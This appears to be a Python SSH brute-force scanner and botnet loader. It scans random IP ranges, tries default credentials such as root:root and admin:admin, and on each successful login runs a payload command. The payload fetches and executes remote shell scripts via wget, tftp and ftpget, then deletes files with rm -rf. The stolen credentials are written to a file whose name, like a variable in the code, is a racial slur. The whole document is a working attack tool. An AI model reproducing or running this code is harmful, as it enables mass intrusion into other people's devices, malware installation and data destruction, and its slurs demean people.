#!/usr/bin/env pythonimport threading, paramiko, random, socket, time, sys

1. #!/usr/bin/env python
2. import threading, paramiko, random, socket, time, sys
3.  
4. paramiko.util.log_to_file("/dev/null")
5.  
6. #PAYLOAD
7. cmd='cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
8.  
9. blacklist = [
10. '127'
11. ]
12.  
13. passwords = [
14. "admin:admin"
15. ]
16.  
17. if sys.argv[4] == '1':
18. passwords = ["root:root"]
19. if sys.argv[4] == '2':
20. passwords = ["guest:guest"]
21. if sys.argv[4] == '3':
22. passwords = ["admin:1234"]
23. if sys.argv[4] == '4':
24. passwords = ["admin:admin"]
25.  
26. print "\x1b[0;31mScanner Started...\x1b[0m"
27.  
28. ipclassinfo = sys.argv[2]
29. if ipclassinfo == "A":
30. ip1 = sys.argv[3]
31. elif ipclassinfo == "B":
32. ip1 = sys.argv[3].split(".")[0]
33. ip2 = sys.argv[3].split(".")[1]
34. elif ipclassinfo == "C":
35. ips = sys.argv[3].split(".")
36. num=0
37. for ip in ips:
38. num=num+1
39. if num == 1:
40. ip1 = ip
41. elif num == 2:
42. ip2 = ip
43. elif num == 3:
44. ip3 = ip
45. class sshscanner(threading.Thread):
46. global passwords
47. global ipclassinfo
48. if ipclassinfo == "A":
49. global ip1
50. elif ipclassinfo == "B":
51. global ip1
52. global ip2
53. elif ipclassinfo == "C":
54. global ip1
55. global ip2
56. global ip3
57. def run(self):
58. while 1:
59. try:
60. while 1:
61. thisipisbad='no'
62. if ipclassinfo == "A":
63. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
64. elif ipclassinfo == "B":
65. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
66. elif ipclassinfo == "C":
67. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
68. elif ipclassinfo == "BRAZIL":
69. br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
70. self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
71. elif ipclassinfo == "ER":
72. yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
73. self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
74. elif ipclassinfo == "LUCKY":
75. lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78","101.108","1.20","125.25","125.26","182.52","118.172","118.174","118.175","125.24"]
76. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
77. elif ipclassinfo == "LUCKY2":
78. lucky2 = [ "122.3","122.52","122.54","119.93","124.105","124.105" ]
79. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
80. elif ipclassinfo == "LUCKY3":
81. lucky2 = [ "103.20","103.30","103.47","103.57" ]
82. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
83. elif ipclassinfo == "RAND":
84. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
85. elif ipclassinfo == "INTERNET":
86. lol = ["1"]
87. self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
88. else:
89. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
90. for badip in blacklist:
91. if badip in self.host:
92. thisipisbad='yes'
93. if thisipisbad=='no':
94. break
95. username='root'
96. password=""
97. port = 22
98. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
99. s.settimeout(3)
100. s.connect((self.host, port))
101. s.close()
102. ssh = paramiko.SSHClient()
103. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
104. dobreak=False
105. for passwd in passwords:
106. if ":n/a" in passwd:
107. password=""
108. else:
109. password=passwd.split(":")[1]
110. if "n/a:" in passwd:
111. username=""
112. else:
113. username=passwd.split(":")[0]
114. try:
115. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
116. dobreak=True
117. break
118. except:
119. pass
120. if True == dobreak:
121. break
122. badserver=True
123. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
124. output = stdout.read()
125. if "inet addr" in output:
126. badserver=False
127. if badserver == False:
128. print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
129. ssh.exec_command(""+cmd+"")
130. nigger = open("niggers.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
131. time.sleep(15)
132. ssh.close()
133. except:
134. pass
135.  
136. for x in range(0,1500):
137. try:
138. t = sshscanner()
139. t.start()
140. except:
141. pass